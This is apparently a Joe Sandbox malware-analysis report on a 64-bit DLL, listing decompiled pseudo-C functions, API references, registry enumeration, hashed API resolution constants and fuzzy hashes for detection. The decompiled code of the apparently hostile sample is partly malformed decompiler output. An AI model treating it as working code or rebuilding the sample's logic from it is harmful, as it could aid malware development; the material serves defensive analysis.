				if (r8d == 0) goto 0x8000160a;
				_t73 = __esi | 0xffffffff;
				r11d = 0;
				r10d = 0;
				_t29 =  *__rdx;
				if (_t29 == 0xd) goto 0x80001419;
				if (_t29 == 0xa) goto 0x80001419;
				if (0 != 0) goto 0x800013ef;
				if (_t29 == 0x20) goto 0x800013f1;
				if (_t29 == 9) goto 0x800013f1;
				goto 0x800013f1;
				if (_t29 != 0x3b) goto 0x800013fd;
				if (r11d != 0) goto 0x8000141d;
				r11d = 1;
				if (_t29 != 0x3d) goto 0x80001407;
				if (0 != 0) goto 0x8000141d;
				if (_t29 != 0x7c) goto 0x8000141d;
				if (r10d != 0) goto 0x8000141d;
				if (1 != 0) goto 0x8000141d;
				r10d = 1;
				goto 0x8000141d;
				if (1 != 0) goto 0x80001424;
				if (1 != 0) goto 0x800013ce;
				if (__rdx == _t143) goto 0x8000160a;
				r13d = r13d - r8d;
				r13d = r13d - 1;
				r14d = r14d + r13d;
				r13d = 1;
				if (r11d == 1) goto 0x800015fb;
				if (1 == 0) goto 0x80001459;
				r12d = 1;
				_t5 = _t140 - 1; // -1
				_t54 = _t5;
				goto 0x8000145c;
				_t173 = _t143;
				if (_t54 == 0) goto 0x80001605;
				if (r10d == 0) goto 0x800014db;
				_t6 = _t164 - 1; // -1
				_t60 = _t6;
				if (_t60 == 0) goto 0x800014db;
				_t31 =  <  ? _t60 : 0x10;
				if (0x10 == 0) goto 0x800014ab;
				r9b =  *__rdx;
				if (r9b == dil) goto 0x800014ab;
				if (r9b == 0x20) goto 0x800014ab;
				_t105 = r9b - 9;
				if (_t105 == 0) goto 0x800014ab;
				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
				if (_t105 != 0) goto 0x8000148c;
				_t61 = _t60 + 1;
				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
				_t162 = _t61 + __rdx;
				if ( *_t162 == 0x20) goto 0x800014c6;
				if ( *_t162 != 9) goto 0x800014cd;
				goto 0x800014ba;
				r9b =  *((intOrPtr*)(_t151 + 0x30));
				_t155 = __rdx + _t126;
				_t55 = _t54 - _t61 + 1;
				goto 0x800014e3;
				r9b = dil;
				 *((intOrPtr*)(_t151 + 0x30)) = dil;
				_t64 =  <  ? _t55 : 0x10;
				r11d = 0x10;
				if (0x10 == 0) goto 0x80001524;
				_t56 =  *_t155;
				if (_t56 == dil) goto 0x80001524;
				if (_t56 == 0x20) goto 0x80001524;
				if (_t56 == 9) goto 0x80001524;
				_t14 = _t130 - 0x61; // -96
				_t113 = _t14 - 0x19;
				if (_t113 > 0) goto 0x80001518;
				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
				r11d = r11d + _t73;
				if (_t113 != 0) goto 0x800014fc;
				_t65 = ( <  ? _t55 : 0x10) - r11d;
				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
				if (r9b != dil) goto 0x80001546;
				r8d = 0x10;
				memcpy(_t182, _t180, _t176);
				if (_t173 == _t143) goto 0x80001591;
				if (1 <= 0) goto 0x80001568;
				if ( *_t173 == 0x20) goto 0x8000155f;
				if ( *_t173 != 9) goto 0x80001568;
				if (1 - 1 < 0) goto 0x80001551;
				if (1 == 1) goto 0x80001593;
				_t38 = _t148 - 1;
				if (_t38 <= 0) goto 0x8000158c;
				_t133 = _t38 + _t173 + 1;
				if ( *_t133 == 0x20) goto 0x80001583;
				if ( *_t133 != 9) goto 0x8000158c;
				if (_t38 + _t73 > 0) goto 0x80001579;
				goto 0x80001593;
				_t22 = _t148 + 1; // 0x1
				r8d = _t22;
				HeapAlloc(_t171, _t143, _t145);
				if (_t126 == _t143) goto 0x800015f8;
				r8d = 0;
				memcpy(_t148, ??);
				 *((intOrPtr*)(__rbx + _t126)) = dil;
				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
				r9d = 0;
				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
				HeapFree(??, ??, ??);
				if (r14d == 0) goto 0x8000160a;
				goto 0x800013bb;
				return 0xb;
			}

0x18000137c
0x18000137c
0x18000137c
0x18000137c
0x180001381
0x180001391
0x180001395
0x18000139e
0x1800013ab
0x1800013b8
0x1800013c8
0x1800013cb
0x1800013ce
0x1800013d3
0x1800013d7
0x1800013db
0x1800013df
0x1800013e3
0x1800013ed
0x1800013f3
0x1800013f8
0x1800013fa
0x1800013ff
0x180001403
0x180001409
0x18000140e
0x180001412
0x180001414
0x180001417
0x18000141b
0x180001422
0x180001427
0x18000142d
0x180001430
0x180001433
0x180001436
0x180001440
0x180001448
0x18000144c
0x18000144f
0x18000144f
0x180001457
0x180001459
0x18000145e
0x180001467
0x180001469
0x180001469
0x18000146f
0x18000147b
0x180001482
0x18000148c
0x180001492
0x180001498
0x18000149a
0x18000149e
0x1800014a0
0x1800014a9
0x1800014ab
0x1800014ad
0x1800014b2
0x1800014b7
0x1800014be
0x1800014c4
0x1800014cb
0x1800014cd
0x1800014d4
0x1800014d7
0x1800014d9
0x1800014db
0x1800014de
0x1800014ea
0x1800014ed
0x1800014f2
0x1800014fc
0x180001502
0x180001507
0x18000150c
0x18000150e
0x180001511
0x180001513
0x180001518
0x18000151f
0x180001522
0x180001524
0x180001527
0x18000152f
0x18000153b
0x180001541
0x180001549
0x18000154f
0x180001556
0x18000155d
0x180001566
0x18000156a
0x18000156c
0x180001574
0x180001576
0x18000157c
0x180001581
0x18000158a
0x18000158f
0x180001593
0x180001593
0x18000159c
0x1800015a8
0x1800015aa
0x1800015b5
0x1800015c2
0x1800015c6
0x1800015d3
0x1800015e0
0x1800015e5
0x1800015f2
0x1800015fe
0x180001600
0x180001623

APIs

memcpy.NTDLL ref: 0000000180001541
HeapAlloc.KERNEL32 ref: 000000018000159C
memcpy.NTDLL ref: 00000001800015B5
HeapFree.KERNEL32 ref: 00000001800015F2

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heapmemcpy$AllocFree
String ID:
API String ID: 1496448200-0
Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001208 Relevance: 5.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
				char _v48;
				long long _v56;
				long long _t43;
				long long _t57;
				long long _t58;
				void* _t68;
				long long* _t73;
				void* _t75;

				_t56 = __rdx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t43 =  *0x8000d4a0;
				r12d = r8d;
				_t75 = __rdx;
				if (__rdx == _t57) goto 0x80001304;
				if (r8d == 0) goto 0x80001304;
				EnterCriticalSection(??);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(??);
				_t7 =  &_a8; // -110
				r8d = 0;
				_v48 = 0;
				_a8 = 0;
				_v56 = _t57;
				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
				r8d = _a8;
				HeapAlloc(??, ??, ??);
				_t58 = _t43;
				if (_t43 == 0) goto 0x800012f8;
				_v48 = 0x10;
				_t14 =  &_a8; // -110
				_t73 = _t14;
				_v56 = __rcx + 0x72;
				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
				 *__r9 = _t58;
				 *_a40 = _a8;
				goto 0x800012fd;
				HeapFree(??, ??, ??);
				goto 0x800012fd;
				asm("lock add dword [esi+0x40], 0xffffffff");
				goto 0x80001313;
				 *_t73 = _t58;
				 *_a40 = 0;
				return 0;
			}

0x180001208
0x180001208
0x18000120d
0x180001212
0x180001224
0x180001237
0x18000123a
0x180001243
0x18000124c
0x180001256
0x18000125c
0x180001265
0x18000126b
0x180001270
0x180001279
0x18000127d
0x180001281
0x180001290
0x180001292
0x18000129c
0x1800012a2
0x1800012a8
0x1800012ae
0x1800012b6
0x1800012b6
0x1800012bb
0x1800012d2
0x1800012e0
0x1800012e4
0x1800012e6
0x1800012f0
0x1800012f6
0x1800012fd
0x180001302
0x18000130c
0x180001311
0x180001331

APIs

EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
LeaveCriticalSection.KERNEL32 ref: 0000000180001265
HeapAlloc.KERNEL32 ref: 000000018000129C
HeapFree.KERNEL32 ref: 00000001800012F0

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeave
String ID:
API String ID: 2939682908-0
Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800081F0 Relevance: 5.1, APIs: 4, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
				signed int _t21;
				signed int _t28;
				signed int* _t38;
				int _t53;
				long long _t58;
				void* _t61;
				void* _t72;
				signed int* _t73;
				long _t75;
				long _t78;
				void* _t81;

				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = _t58;
				 *((long long*)(_t61 + 0x18)) = __rsi;
				_t21 =  *__rcx & 0x0000ffff;
				_t38 = __rbx + 4;
				r11d = __edx;
				r10d = 0x57;
				if (__r11 - _t38 <= 0) goto 0x800082e1;
				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
				if (_t21 == 0) goto 0x800082e1;
				if (_t21 - 0x200 > 0) goto 0x800082e1;
				if (_t28 == 0) goto 0x800082e1;
				if (_t28 - 0x200 > 0) goto 0x800082e1;
				r15d = 0x404;
				HeapAlloc(_t81, _t78, _t75);
				_t73 = _t38;
				if (_t38 == 0) goto 0x800082db;
				memset(_t72, _t53);
				 *_t73 = (_t21 & 0x0000fff0) << 3;
				memcpy(??, ??, ??);
				memcpy(??, ??, ??);
				 *__r8 = _t73;
				 *__r9 = r15d;
				r10d = 0;
				goto 0x800082e1;
				r10d = 8;
				return r10d;
			}

0x1800081f0
0x1800081f5
0x1800081fa
0x180008213
0x18000821d
0x180008221
0x18000822a
0x180008236
0x18000823c
0x18000824b
0x180008253
0x180008260
0x180008264
0x180008268
0x18000826a
0x180008278
0x18000827e
0x180008284
0x18000828e
0x1800082b0
0x1800082b4
0x1800082ca
0x1800082cf
0x1800082d2
0x1800082d6
0x1800082d9
0x1800082db
0x180008300

APIs

HeapAlloc.KERNEL32 ref: 0000000180008278
memset.NTDLL ref: 000000018000828E
memcpy.NTDLL ref: 00000001800082B4
memcpy.NTDLL ref: 00000001800082CA

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: memcpy$AllocHeapmemset
String ID:
API String ID: 609429373-0
Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800030C8 Relevance: 5.1, APIs: 4, Instructions: 77memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
memcpy.NTDLL ref: 000000018000314B
memcpy.NTDLL ref: 000000018000317D

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: memcpy$AllocHeaplstrlen
String ID:
API String ID: 2888080719-0
Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008C60 Relevance: 5.1, APIs: 4, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
String ID:
API String ID: 2387776105-0
Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006008 Relevance: 5.1, APIs: 4, Instructions: 68memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
HeapAlloc.KERNEL32 ref: 0000000180006057
_snprintf.NTDLL ref: 00000001800060B9
lstrcpyA.KERNEL32 ref: 00000001800060DD

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: AllocHeap_snprintflstrcpylstrlen
String ID:
API String ID: 2416262065-0
Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003E58 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000180003EE6
HeapFree.KERNEL32 ref: 0000000180003EFA
HeapFree.KERNEL32 ref: 0000000180003F0E
HeapFree.KERNEL32 ref: 0000000180003F22

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: FreeHeap$ErrorLast
String ID:
API String ID: 2332451156-0
Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005BDC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000000,00000000,0000000180001A27), ref: 0000000180005C15
memcpy.NTDLL ref: 0000000180005C31
EnterCriticalSection.KERNEL32 ref: 0000000180005C45
LeaveCriticalSection.KERNEL32 ref: 0000000180005C72

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CriticalSection$AllocEnterHeapLeavememcpy
String ID:
API String ID: 224082080-0
Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001C00 Relevance: 5.0, APIs: 4, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C29
HeapAlloc.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C3F
memcpy.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C56
memset.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C68

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: AllocHeaplstrlenmemcpymemset
String ID:
API String ID: 422472530-0
Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 5952, Parent PID: 2512COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1028
Total number of Limit Nodes:	15

Executed Functions

Function 000000018000508C Relevance: 18.2, APIs: 12, Instructions: 241
memoryregistrythreadCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0000000118000508C(void* __eax, void* __ecx, void* __edi, void* __esi, void* __ebp, long long __rax, long long __rbx, long long __rcx, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r14;
				void* __r15;
				long _t56;
				long _t58;
				struct HINSTANCE__* _t70;
				void* _t73;
				long long* _t148;
				void* _t149;
				void* _t155;
				int _t190;
				long long _t191;
				int _t193;
				long long _t194;
				struct _CRITICAL_SECTION* _t200;
				void* _t203;
				void* _t204;
				signed short* _t213;
				void* _t216;
				void* _t217;
				long long _t218;
				void* _t219;
				long _t221;
				long _t225;
				void* _t227;
				intOrPtr _t228;

				_t156 = __rbx;
				_t148 = __rax;
				 *((long long*)(_t203 + 0x20)) = __rbx;
				 *((long long*)(_t203 + 8)) = __rcx;
				_t204 = _t203 - 0x230;
				_t201 =  *0x8000d4a0;
				_t228 =  *0x8000d490;
				r14d =  *0x8000d498;
				HeapAlloc(_t227, _t225, _t221);
				r12d = 0;
				_t191 = __rax;
				if (__rax == _t219) goto 0x80005419;
				memset(_t219, _t190, _t193);
				InitializeCriticalSection(_t200);
				_t5 = _t191 + 0x98; // 0x98
				_t218 = _t5;
				 *_t218 = _t218;
				 *((long long*)(__rax + 0xa0)) = _t218;
				if (E00000001180008B44(__esi, __rax - _t219, __rax, __rbx, _t193, __rbx, _t216, _t225, _t228) != r12d) goto 0x8000540f;
				E0000000118000459C(E00000001180007678(__ecx, __esi, E00000001180008B44(__esi, __rax - _t219, __rax, __rbx, _t193, __rbx, _t216, _t225, _t228) - r12d, __rax, _t156, __rax, _t193), 0xdc444c2b,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t148 == _t219) goto 0x80005144;
				r9d = 0;
				r8d = 0;
				 *_t148();
				goto 0x80005147;
				_t149 = _t219;
				 *(_t191 + 0x28) = _t149;
				if (_t149 != _t219) goto 0x8000515b;
				GetLastError();
				goto 0x80005408;
				r8d = 0x1102;
				HeapAlloc(??, ??, ??);
				_t194 =  *0x8000d4a0;
				if (_t194 == _t219) goto 0x80005226;
				 *_t194 = r12w; // executed
				_t56 = RegOpenKeyW(??, ??, ??); // executed
				if (_t56 != r12d) goto 0x80005216;
				goto 0x800051cf;
				r12d = r12d + 1;
				if (E00000001180009110(_t56, __edi, _t156, _t194, _t204 + 0x20, _t194, _t204 + 0x278, _t216) != 0) goto 0x800051ee;
				r9d = 0x104; // executed
				_t58 = RegEnumKeyW(??, ??, ??, ??); // executed
				if (_t58 == 0) goto 0x800051b6;
				r12d = 0;
				if (_t58 != 0x103) goto 0x80005203;
				 *0x8000d480 = _t194;
				RegCloseKey(??); // executed
				if (r12d == r12d) goto 0x80005234;
				HeapFree(??, ??, ??);
				goto 0x8000522b;
				if (8 != r12d) goto 0x8000540f;
				_t195 =  *0x8000d490;
				r8d = 8;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t204 + 0x286)) = r12w;
				if (E00000001180005CA4(8, 8 - r12d, _t156, _t191, _t204 + 0x280, _t191,  *0x8000d490) == r12d) goto 0x8000529c;
				if (E00000001180005CA4(_t62, E00000001180005CA4(8, 8 - r12d, _t156, _t191, _t204 + 0x280, _t191,  *0x8000d490) - r12d, _t156, _t191, _t204 + 0x280, _t191,  *0x8000d490) != r12d) goto 0x8000540f;
				_t28 = _t191 + 8; // 0x8
				if (E00000001180006DCC(0x7ffe0030, _t156, _t191, _t28, _t191,  *0x8000d490) != r12d) goto 0x800052e2;
				E00000001180003C24(_t156, _t191, _t191,  *0x8000d490,  *0x8000d4a0);
				 *((long long*)(_t191 + 0x30)) = 0x180000000;
				if (0x180000000 == _t219) goto 0x800052e2;
				_t30 = _t191 + 8; // 0x8
				E00000001180003C24(_t156, _t30, _t191, _t195,  *0x8000d4a0);
				 *((long long*)(_t191 + 0x38)) = 0x180000000;
				_t91 =  !=  ? r12d : 8;
				_t134 = ( !=  ? r12d : 8) - r12d;
				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
				if (E00000001180008708(_t156, _t191) != r12d) goto 0x80005302;
				goto 0x8000540f;
				_t213 = _t228 + 0x18000f000;
				r9d = _t213[1] & 0x0000ffff;
				r11d =  *_t213 & 0x0000ffff;
				_t217 = __r9 + 8;
				if (_t218 - _t217 <= 0) goto 0x80005339;
				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
				E00000001180004ED8(__r9 +  &(_t213[4]), _t28);
				goto 0x8000533c;
				if (_t219 != _t219) goto 0x8000534b;
				goto 0x8000540f;
				r14d = r14d ^ 0xecb028fc;
				if (_t218 - _t217 <= 0) goto 0x8000536e;
				if (r14d == r12d) goto 0x80005371;
				E00000001180004ED8(__r9 +  &(_t213[4]), _t28);
				goto 0x80005371;
				_t155 = _t219;
				if (_t155 == _t219) goto 0x80005341;
				 *(_t191 + 0x40) = _t213;
				 *0x8000d488 = _t191;
				_t70 = GetModuleHandleA(??);
				if (_t155 ==  *((intOrPtr*)(_t204 + 0x270))) goto 0x800053fb;
				E0000000118000459C(_t70, 0xaade337c,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t155 == _t219) goto 0x800053be;
				r8d = GetCurrentThreadId();
				_t73 =  *_t155();
				goto 0x800053c1;
				if (_t219 == _t219) goto 0x80005150;
				E0000000118000459C(_t73, 0x1c8cff93,  *((intOrPtr*)(_t201 + 0x18)));
				if (_t155 == _t219) goto 0x800053ee;
				 *_t155();
				goto 0x800053f1;
				if (r12d != r12d) goto 0x8000541e;
				goto 0x80005150;
				asm("lock add dword [ebp+0x38], 0x1");
				if (E00000001180002B60(2, __edi, __esi, __ebp, _t191, __r9, _t217, _t218) == r12d) goto 0x8000541e;
				E00000001180005578(_t156, _t191, _t219);
				goto 0x8000541e;
				return 8;
			}

0x18000508c
0x18000508c
0x18000508c
0x180005091
0x1800050a1
0x1800050a8
0x1800050af
0x1800050b6
0x1800050cb
0x1800050d1
0x1800050d4
0x1800050da
0x1800050e8
0x1800050f1
0x1800050f7
0x1800050f7
0x1800050fe
0x180005101
0x180005112
0x180005129
0x180005131
0x180005138
0x18000513b
0x180005140
0x180005142
0x180005144
0x180005147
0x18000514e
0x180005150
0x180005156
0x180005164
0x180005171
0x180005177
0x180005184
0x1800051a1
0x1800051a5
